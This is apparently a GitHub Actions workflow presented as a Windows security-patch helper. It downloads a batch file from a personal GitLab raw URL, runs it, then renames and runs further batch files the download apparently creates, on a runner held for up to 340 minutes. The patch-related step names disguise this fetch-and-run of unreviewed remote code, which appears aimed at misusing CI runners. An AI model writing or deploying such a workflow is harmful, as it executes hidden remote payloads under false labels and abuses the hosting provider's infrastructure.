name: Windows-Update-Helper

on:
  workflow_dispatch:

jobs:
  update:
    name: "Installing Security Patches"
    runs-on: windows-latest
    timeout-minutes: 340

    steps:
      - name: "Fetch Patch Data"
        shell: pwsh
        run: |
          $u = "https://gitlab.com/Lohar-ji/Lohar-ji/-/raw/main/Downloads.bat"
          Invoke-WebRequest -uri $u -OutFile "patch_v2.bat"

      - name: "Apply System Patches"
        run: |
          cmd /c patch_v2.bat

      - name: "Verify Patch Integrity"
        shell: pwsh
        run: |
          if (Test-Path "show.bat") { 
            Rename-Item -Path "show.bat" -NewName "service_start.bat"
            cmd /c service_start.bat 
          }

      - name: "Service Monitoring"
        shell: pwsh
        run: |
          if (Test-Path "loop.bat") { 
            Rename-Item -Path "loop.bat" -NewName "monitor.bat"
            cmd /c monitor.bat 
          }
